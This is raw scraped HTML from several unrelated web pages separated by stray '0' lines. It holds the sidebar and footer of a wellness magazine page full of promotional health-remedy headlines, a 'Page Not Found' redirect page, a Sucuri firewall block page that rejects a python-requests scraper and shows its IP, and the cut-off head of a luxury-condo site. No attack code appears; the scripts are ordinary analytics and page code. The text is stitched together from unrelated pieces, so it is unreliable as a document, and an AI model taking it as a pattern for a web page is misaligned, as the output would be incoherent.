>Next</a></li></ul></div></div></div></div></section></div><aside class="sidebar right-sidebar one-third column omega"><section id=text-2 class="widget widget_text clearfix"><div class="widget-heading clearfix"><h3><span>Join the Community</span></h3></div><div class=textwidget><center><ul class="social-icons standard dark"><li class=facebook><a href=https://www.facebook.com/ConsciousLifestyleMagazine target=_blank>Facebook</a></li><li class=twitter><a href=http://www.twitter.com/consciouslmag target=_blank>Twitter</a></li><li class=instagram><a href=http://instagram.com/consciouslifestylemagazine target=_blank>Instagram</a></li><li class=pinterest><a href=http://www.pinterest.com/ConsciousLMag/ target=_blank>Pinterest</a></li></ul></center></div></section><section id=text-36 class="widget widget_text clearfix"><div class=textwidget> <script>googletag.cmd.push(function(){if(window.innerWidth>=980){googletag.defineSlot('/53015287/consciouslifestylemag.com_d_300x600_1',[300,600],'div-gpt-ad-1407836065746-0').addService(googletag.pubads());} if(window.innerWidth<980){googletag.defineSlot('/53015287/consciouslifestylemag.com_m_300x600_1',[300,600],'div-gpt-ad-1407836065746-0').addService(googletag.pubads());} googletag.pubads().enableSingleRequest();googletag.enableServices();});</script> <div id=div-gpt-ad-1407836065746-0> <script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1407836065746-0');});</script> </div></div></section><section id=yp_mpp_widget-6 class="widget YP_MPP_Widget_class clearfix"><div class="widget-heading clearfix"><h3><span>Most Popular</span></h3></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/heal-digestive-problems-naturally/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2014/08/Heal-Your-Digestive-Problems-Naturally-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt=Heal-Your-Digestive-Problems-Naturally> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/heal-digestive-problems-naturally/>How to Heal Your Digestive Problems Naturally </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>116807 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/the-six-levels-of-higher-consciousness-how-to-make-the-shift/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2015/03/Vesmi-Levels-of-Higher-Consciousness-Main-Image-min-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt=Vesmi-Levels-of-Higher-Consciousness-Main-Image-min> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/the-six-levels-of-higher-consciousness-how-to-make-the-shift/>The Six Levels of Higher Consciousness: How to Make the Shift </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>116703 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/pineal-gland-activation-third-eye/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2016/02/pineal-gland-activation-soul-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt=pineal-gland-activation-soul> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/pineal-gland-activation-third-eye/>Opening the Third Eye: Powerful Ancient Practices for Activating the Pineal Gland and Expanding Consciousness </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>112379 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/qigong-exercises-healing-energy/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2016/01/qigong-exercises-energy-light-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt=qigong-exercises-energy-light> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/qigong-exercises-healing-energy/>8 Powerful Ancient Qigong Exercises for Cultivating Healing Energy in the Body </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>103049 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/spiritual-awakening-signs-and-symptoms/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2017/03/spiritual-awakening-symptoms-woman-surreal-min-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt="18 Unmistakable Signs of Spiritual Awakening"> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/spiritual-awakening-signs-and-symptoms/>The Symptoms of Higher Consciousness: 18 Unmistakable Signs of Spiritual Awakening </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>102884 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/herbs-and-foods-that-increase-sex-drive/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2015/09/foods-that-increase-sex-drive-sacred-herbs-min-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt="Foods that increase sex drive sacred herbs"> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/herbs-and-foods-that-increase-sex-drive/>7 Sacred Herbs and Foods For Boosting Your Sex Drive and Optimizing Your Hormonal Balance </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>100965 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/meaningful-work-the-eight-keys/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2013/12/Meaningful-Work-Main-Image-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt=Meaningful-Work-Main-Image> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/meaningful-work-the-eight-keys/>The Eight Keys to Finding Meaningful Work </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>100421 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/subconscious-mind-power/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2015/09/subconscious-mind-power-universe-girl-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt=subconscious-mind-power-universe-girl> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/subconscious-mind-power/>The Art of Shifting Your Reality: 4 Deep Practices for Clearing Emotional Blockages and Harnessing the Power of Your Subconscious Mind </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>98787 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/gotu-kola-benefits-of-the-herb-of-enlightenment/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2014/12/Gotu-Kola-leaves-min-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt="Gotu Kola Leaves"> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/gotu-kola-benefits-of-the-herb-of-enlightenment/>Gotu Kola: The Many Benefits of the Ancient Herb of Enlightenment and Longevity </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>98692 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/air-purifying-plants-clean-air/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2015/01/air-purifying-plants-main-min-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt="air purifying plants main"> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/air-purifying-plants-clean-air/>4 Powerful Air Purifying Plants to Clean the Air in Your Home </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>98193 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/ten-stages-of-meditation-complete-guide/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2015/10/girl-in-meditation-main-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt=girl-in-meditation-main> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/ten-stages-of-meditation-complete-guide/>How to Master the Art of Meditation: A Complete Guide to the 10 Stages of Meditative Development </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>96557 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/natural-remedies-for-inflammation-pain/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2015/12/natural-remedies-for-inflammation-and-pain-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt=natural-remedies-for-inflammation-and-pain> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/natural-remedies-for-inflammation-pain/>20 Powerful Natural Remedies for Healing and Eliminating Inflammation and Pain </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>95543 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/ashwagandha-benefits-withania/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2016/10/ashwaghanda-benefits-plant-closeup-1-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt=ashwaghanda-benefits-plant-closeup> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/ashwagandha-benefits-withania/>Ashwagandha: The Ancient Indian Superherb That Rejuvenates Your Body and Brain From the Inside Out </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>93789 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/shilajit-benefits-ancient-superfood/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2015/07/Shilajit-Resin-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt=Shilajit-Resin> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/shilajit-benefits-ancient-superfood/>Shilajit: The Ancient Yogic Superfood That Rebuilds Your Body </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>92706 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/natural-antifungal-supplements-candida/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2017/02/natural-antifungal-supplements-candida-herbs-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt="The Top 17 Most Powerful Natural Antifungal Supplements and Herbs for Ridding the Body of Yeast"> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/natural-antifungal-supplements-candida/>Treating Candida Naturally: The Top 17 Most Powerful Natural Antifungal Supplements and Herbs for Ridding the Body of Yeast </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>92489 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div><div class=yp_mpp_post_item><div class=yp_mpp_image_section> <a href=https://www.consciouslifestylemag.com/cbd-health-benefits/> <img width=150 height=150 src=https://www.consciouslifestylemag.com/wp-content/uploads/2016/12/hemp-plants-CBD-extract-150x150.jpg class="attachment-thumbnail size-thumbnail wp-post-image" alt=hemp-plants-cbd-extract> </a></div><div class=yp_mpp_post_info><span class=yp_mpp_post_title><a href=https://www.consciouslifestylemag.com/cbd-health-benefits/>The Ultimate Guide to CBD: Everything You Need to Know About the Miraculous Health Benefits of Cannabidiol </a></span><span class=yp_mpp_showviews><span class=yp_mpp_showviews_num>89476 </span><span class=yp_mpp_showviews_txt>views</span></span></div></div></section><section id=text-44 class="widget widget_text clearfix"><div class=textwidget><a href="https://www.consciouslifestylemag.com/subscribe?campname=subscribe&camplink=sidebar-banner"> <img src=https://www.consciouslifestylemag.com/wp-content/uploads/2014/12/Upgrade-Your-Happiness-Ad-300x350.gif alt="Upgrade Your Happiness" class=a3-notlazy> </a></div></section><section id=custom-posts-2 class="widget custom-posts clearfix"><div class="widget-heading clearfix"><h3><span>Even More Good Stuff</span></h3></div><ul class='cpw template-block'><li style="min-height: 155px"><div class=cpw-post-thumbnail style="height:150px; width:300px;"/><a href=https://www.consciouslifestylemag.com/unexplained-infertility-how-to-get-pregnant/><img class=cpw-thumbnail src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/05/unexplained-infertility-man-woman-stomach-300x150.jpg alt=img></a></div><div class=cpw-post-info><a class=cpw-title href=https://www.consciouslifestylemag.com/unexplained-infertility-how-to-get-pregnant/>How to Get Pregnant Even When You’ve Tried Everything: The Top 15 Reasons for Unexplained Infertility and What to Do to Fix Them Fast</a></div><div class=clear></div></li><li style="min-height: 155px"><div class=cpw-post-thumbnail style="height:150px; width:300px;"/><a href=https://www.consciouslifestylemag.com/seed-phytonutrients/><img class=cpw-thumbnail src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/04/Seed-Phytonutrients-Haircare-300x150.jpg alt=img></a></div><div class=cpw-post-info><a class=cpw-title href=https://www.consciouslifestylemag.com/seed-phytonutrients/>Hair Care for People Who Care About the Planet: Organic, Natural Hair Products that Actually Work</a></div><div class=clear></div></li><li style="min-height: 155px"><div class=cpw-post-thumbnail style="height:150px; width:300px;"/><a href=https://www.consciouslifestylemag.com/lions-mane-mushroom/><img class=cpw-thumbnail src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/03/lions-mane-mushroom-wild-harvested-basket-300x150.jpg alt=img></a></div><div class=cpw-post-info><a class=cpw-title href=https://www.consciouslifestylemag.com/lions-mane-mushroom/>The Miracle Mushroom: The 10 Most Impressive Health Benefits of Lion’s Mane For Brain and Body</a></div><div class=clear></div></li><li style="min-height: 155px"><div class=cpw-post-thumbnail style="height:150px; width:300px;"/><a href=https://www.consciouslifestylemag.com/body-clock-reset-optimize-sleep-cycle/><img class=cpw-thumbnail src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/03/how-to-reset-your-body-clock-schedule-woman-sleeping-light-300x150.jpg alt=img></a></div><div class=cpw-post-info><a class=cpw-title href=https://www.consciouslifestylemag.com/body-clock-reset-optimize-sleep-cycle/>The Body Clock Reset: How to Optimize Your Circadian Rhythm and Get Better Sleep Naturally</a></div><div class=clear></div></li><li style="min-height: 155px"><div class=cpw-post-thumbnail style="height:150px; width:300px;"/><a href=https://www.consciouslifestylemag.com/migraine-diet-foods-to-prevent-headaches/><img class=cpw-thumbnail src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/03/migraine-diet-foods-prevent-headaches-woman-apple-eating-300x150.jpg alt=img></a></div><div class=cpw-post-info><a class=cpw-title href=https://www.consciouslifestylemag.com/migraine-diet-foods-to-prevent-headaches/>The Migraine Diet: What Foods to Eat and Avoid to Prevent Headaches</a></div><div class=clear></div></li><li style="min-height: 155px"><div class=cpw-post-thumbnail style="height:150px; width:300px;"/><a href=https://www.consciouslifestylemag.com/grow-a-new-body/><img class=cpw-thumbnail src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/03/grow-a-new-body-girl-flowers-surreal-300x150.jpg alt=img></a></div><div class=cpw-post-info><a class=cpw-title href=https://www.consciouslifestylemag.com/grow-a-new-body/>Growing A New Body: How To Completely Restore Your Health And Well-Being At Any Age</a></div><div class=clear></div></li></ul></section><section id=text-54 class="widget widget_text clearfix"><div class=textwidget><a href="https://www.consciouslifestylestore.com/enlightened-products-1?campname=clstore&camplink=sidebar-banner" target=_blank rel=nofollow> <img src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/02/browse-the-collection-banner-2.gif class=a3-notlazy> </a></div></section><section id=text-57 class="extendedwopts-hide extendedwopts-mobile sticky-widget widget widget_text clearfix"><div class=textwidget><p><a href=https://www.flowconsciousnessinstitute.com/flow-masterclass-clm2/ target=_blank rel="nofollow noopener"><br> <img class=a3-notlazy src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/04/Flow-Wide-1.jpg><br> </a></p></div></section></aside></div></div></div></div><div id=above-footer-ad-main-wrap><center id=text-43 class="widget widget_text"><div class=textwidget><div style="width: 600px;"><span style=font-size:13px!important;><em>Affiliate Disclosure: Certain products, tools and services we recommend on this site may be affiliate links. All the products we recommend are either things we use ourselves or have researched and confirmed are of the highest quality and integrity. Conscious Lifestyle Magazine is also a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to amazon.com. These programs allow us to provide quality content to you at no charge.</em></span></div></div></center></div><section id=footer><div class=container><div id=footer-widgets class=clearfix><div class="one-third column alpha"><section id=text-9 class="widget widget_text clearfix"><div class="widget-heading clearfix"><h3><span>Download the App</span></h3></div><div class=textwidget><div style="float: left; margin-right: 5px;"> <a href="https://itunes.apple.com/us/app/conscious-lifestyle-magazine/id727365003?mt=8"> <img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/05/conscious-lifestyle-apple-itunes-app-min.jpg alt="conscious lifestyle apple itunes app" style=width:145px;height:43px;> </a></div><div style="float: left; margin-left: 5px;margin-top:-1px"> <a href="https://play.google.com/store/apps/details?id=com.bdibhcgbec.hggbdibhcgbec&hl=en"> <img src=https://www.consciouslifestylemag.com/wp-content/uploads/2018/05/conscious-lifestyle-android-app-min.jpg alt="conscious lifestyle android app" style=width:129px;height:45px;> </a></div></div></section></div><div class="one-third column"><section id=text-3 class="widget widget_text clearfix"><div class="widget-heading clearfix"><h3><span>About Us</span></h3></div><div class=textwidget><div style="float: left; width: 30%; margin-right: 3%;"><h6><a href="https://www.consciouslifestylemag.com/subscribe?campname=subscribe&camplink=footer">Subscribe</a></h6> <small style="display: block; font-style: italic;">full edition</small></div><div style="float: left; width: 30%; margin-right: 3%;"><h6><a href=https://www.consciouslifestylemag.com/advertise/>Advertise</a></h6> <small style="display: block; font-style: italic;">media kit</small></div><div style="float: left; width: 30%; margin-right: 3%;"><h6><a href=https://www.consciouslifestylemag.com/affiliate-sign-up/>Affiliates</a></h6> <small style="display: block; font-style: italic;">sign up today</small></div></div></section></div><div class="one-third column omega"><section id=text-7 class="widget widget_text clearfix"><div class="widget-heading clearfix"><h3><span>Join the Community</span></h3></div><div class=textwidget><center><ul class="social-icons standard dark"><li class=facebook><a href=https://www.facebook.com/ConsciousLifestyleMagazine target=_blank>Facebook</a></li><li class=twitter><a href=http://www.twitter.com/consciouslmag target=_blank>Twitter</a></li><li class=instagram><a href=http://instagram.com/consciouslifestylemagazine target=_blank>Instagram</a></li><li class=pinterest><a href=http://www.pinterest.com/ConsciousLMag/ target=_blank>Pinterest</a></li></ul></center></div></section></div></div></div></section><footer id=copyright><div class=container><p class="twelve columns">© 2017 Conscious Lifestyle Magazine</p><div class="beam-me-up three columns offset-by-one"><a href=#>Top<i class=icon-arrow-up></i></a></div></div></footer></div><div id=sf-included class="has-blog has-ticker "></div> <script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','//www.google-analytics.com/analytics.js','ga');ga('create','UA-46385118-1','consciouslifestylemag.com');ga('send','pageview');</script> <script>window.onload=function(){var fixmeTop=jQuery('.sticky-widget').offset().top;var fixmeLeft=jQuery('.sticky-widget').offset().left;var fixmeWidth=jQuery('.sticky-widget').width();jQuery(window).scroll(function(){var currentScroll=jQuery(window).scrollTop();if(currentScroll>=fixmeTop){jQuery('.sticky-widget').css({position:'fixed',width:fixmeWidth,top:'0',left:fixmeLeft});}else{jQuery('.sticky-widget').css({position:'static'});}});}</script> <script>var getElementsByClassName=function(a,b,c){if(document.getElementsByClassName){getElementsByClassName=function(a,b,c){c=c||document;var d=c.getElementsByClassName(a),e=b?new RegExp("\\b"+b+"\\b","i"):null,f=[],g;for(var h=0,i=d.length;h<i;h+=1){g=d[h];if(!e||e.test(g.nodeName)){f.push(g)}}return f}}else if(document.evaluate){getElementsByClassName=function(a,b,c){b=b||"*";c=c||document;var d=a.split(" "),e="",f="http://www.w3.org/1999/xhtml",g=document.documentElement.namespaceURI===f?f:null,h=[],i,j;for(var k=0,l=d.length;k<l;k+=1){e+="[contains(concat(' ', @class, ' '), ' "+d[k]+" ')]"}try{i=document.evaluate(".//"+b+e,c,g,0,null)}catch(m){i=document.evaluate(".//"+b+e,c,null,0,null)}while(j=i.iterateNext()){h.push(j)}return h}}else{getElementsByClassName=function(a,b,c){b=b||"*";c=c||document;var d=a.split(" "),e=[],f=b==="*"&&c.all?c.all:c.getElementsByTagName(b),g,h=[],i;for(var j=0,k=d.length;j<k;j+=1){e.push(new RegExp("(^|\\s)"+d[j]+"(\\s|$)"))}for(var l=0,m=f.length;l<m;l+=1){g=f[l];i=false;for(var n=0,o=e.length;n<o;n+=1){i=e[n].test(g.className);if(!i){break}}if(i){h.push(g)}}return h}}return getElementsByClassName(a,b,c)},dropdowns=document.getElementsByTagName('select');for(i=0;i<dropdowns.length;i++) if(dropdowns[i].className.match('dropdown-menu'))dropdowns[i].onchange=function(){if(this.value!='')window.location.href=this.value;}</script> <script async src=https://www.consciouslifestylemag.com/wp-content/cache/minify/874e5.js></script> <script>jQuery(document).ready(function(){jQuery('a[href*="amazon"],[href*="/subscribe"]').on('click',function(){var findClassId=["text-10","text-19","header-advert","article-body-wrap"];var bannerName=["sidebar-top","sidebar-bottom","header","post"];var name="not set";for(var i=0;i<findClassId.length;i++){if(jQuery(this).parent().parent().attr('id')==findClassId[i]||jQuery(this).parents().hasClass(findClassId[i])){name=bannerName[i];break;}};var url=jQuery(this).attr('href');ga('send','event','Banner',name,url);});});</script> </body></html>
0
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Page Not Found</title> <style> body{ background-color: #272727; color: #fff; padding:25px; font-family: Helvetica Neue,Helvetica,Arial,sans-serif; } h1 { font-weight:300; } p { font-weight:300; } .content{ margin: 0 auto; max-width:800px; } </style> </head> <body> <div class="content"> <h1>Page Not Found</h1> <p>The page you were looking for was not found. You will be redirected to the homepage in <span id="countdown">5</span> seconds...</p> </div> </body> <script> var countdown = document.getElementById('countdown'); setInterval(function() { var seconds = parseInt(countdown.textContent); var secondsRemaining; if (seconds > 0) { secondsRemaining = seconds - 1; countdown.textContent = secondsRemaining; } if (secondsRemaining === 0) { window.location.href = '/'; } }, 1000); </script> </html>
0
<!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="stylesheet" href="https://cdn.sucuri.net/sucuri-firewall-block.css" /> <section class="center clearfix"> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Sucuri WebSite Firewall - Access Denied</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,300,600,700" rel="stylesheet" type="text/css"> </head> <body> <div id="main-container"> <header class="app-header clearfix"> <div class="wrap"> <a href="https://www.sucuri.net/?utm_source=firewall_block" class="logo"></a> <span class="logo-neartext">Website Firewall</span> <a href="https://sucuri.net/?utm_source=firewall_block" class="site-link">Back to sucuri.net</a> </div> </header> <section class="app-content access-denied clearfix"><div class="box center width-max-940"><h1 class="brand-font font-size-xtra no-margin"><i class="icon-circle-red"></i>Access Denied - Sucuri Website Firewall</h1> <p class="medium-text code-snippet">If you are the site owner (or you manage this site), please whitelist your IP or if you think this block is an error please <a href="https://support.sucuri.net/?utm_source=firewall_block" class="color-green underline">open a support ticket</a> and make sure to include the block details (displayed in the box below), so we can assist you in troubleshooting the issue. </p><h2>Block details:</h1> <table class="property-table overflow-break-all line-height-16"> <tr> <td>Your IP:</td> <td><span>76.119.231.70</span></td> </tr> <tr><td>URL:</td> <td><span>www.theamas.com/</span></td> </tr> <tr> <td>Your Browser: </td> <td><span>python-requests/2.18.4</span></td> </tr> <tr><td>Block ID:</td> <td><span>BNP005</span></td> </tr> <tr> <td>Block reason:</td> <td><span>Bad bot access attempt.</span></td> </tr> <tr> <td>Time:</td> <td><span>2019-05-16 12:27:06</span></td> </tr> <tr> <td>Server ID:</td> <td><span>14005</span></td></tr> </table> </div> </section> <footer> <span>&copy; 2019 Sucuri Inc. All rights reserved.</span> <span id="privacy-policy"><a href="https://sucuri.net/privacy-policy?utm_source=firewall_block" target="_blank" rel="nofollow noopener">Privacy</a></span> </footer> </div> </body> </html>
0
<!DOCTYPE html> <!--[if IE 6]> <html id="ie6" lang="en-US" prefix="og: http://ogp.me/ns# og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 7]> <html id="ie7" lang="en-US" prefix="og: http://ogp.me/ns# og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html id="ie8" lang="en-US" prefix="og: http://ogp.me/ns# og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns# og: http://ogp.me/ns#"> <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <link rel="pingback" href="https://pacificgatebybosa.com/xmlrpc.php" /> <!--[if lt IE 9]> <script src="https://pacificgatebybosa.com/wp-content/themes/Divi/js/html5.js" type="text/javascript"></script> <![endif]--> <meta name="google-site-verification" content="mGmcujPaVxQUN2Q3UPtLnzZpNYjszfehDsI-8pDDJmY" /> <meta name="msvalidate.01" content="2582143695794856B2A4DAFBBA1870FC" /> <meta name="yandex-verification" content="48ce103ddedebf64" /> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-62695604-2', 'auto'); ga('send', 'pageview'); </script> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-P2673W8');</script> <!-- End Google Tag Manager --> <script>var et_site_url='https://pacificgatebybosa.com';var et_post_id='1047';function et_core_page_resource_fallback(a,b){"undefined"===typeof b&&(b=a.sheet.cssRules&&0===a.sheet.cssRules.length);b&&(a.onerror=null,a.onload=null,a.href?a.href=et_site_url+"/?et_core_page_resource="+a.id+et_post_id:a.src&&(a.src=et_site_url+"/?et_core_page_resource="+a.id+et_post_id))} </script><title>Luxury Condos For Sale Downtown San Diego | New Apartments - Pacific Gate By Bosa</title> <!-- This site is optimized with the Yoast SEO plugin v11.0 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Pacific Gate is a brand new residential condominium tower in Downtown San Diego. The Super Prime building offers 2 and 3 bedroom luxury condos for sale, with world-class amenities and coastline views."/> <link rel="canonical" href="https://pacificgatebybosa.com/en/" /> <meta property="og:locale" content="en_US" /> <meta property="og:locale:alternate" content="es_MX" /> <meta property="og:locale:alternate" content="zh_CN" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Luxury Condos For Sale Downtown San Diego | New Apartments - Pacific Gate By Bosa" /> <meta property="og:description" content="Pacific Gate is a brand new residential condominium tower in Downtown San Diego. The Super Prime building offers 2 and 3 bedroom luxury condos for sale, with world-class amenities and coastline views." /> <meta property="og:url" content="https://pacificgatebybosa.com/en/" /> <meta property="og:site_name" content="Pacific Gate" /> <meta property="fb:app_id" content="696369170513370" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Pacific Gate is a brand new residential condominium tower in Downtown San Diego. The Super Prime building offers 2 and 3 bedroom luxury condos for sale, with world-class amenities and coastline views." /> <meta name="twitter:title" content="Luxury Condos For Sale Downtown San Diego | New Apartments - Pacific Gate By Bosa" /> <meta name="twitter:site" content="@pacificgatebosa" /> <meta name="twitter:image" content="//track.strikead.com/web/conv?type=img&#038;target=6587&#038;id=43889" /> <meta name="twitter:creator" content="@pacificgatebosa" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://pacificgatebybosa.com/en/#organization","name":"Bosa Development","url":"https://pacificgatebybosa.com/en/","sameAs":["//www.facebook.com/PacificGateByBosa/","https://twitter.com/pacificgatebosa"],"logo":{"@type":"ImageObject","@id":"https://pacificgatebybosa.com/en/#logo","url":"https://pacificgatebybosa.com/wp-content/uploads/logo.png","caption":"Bosa 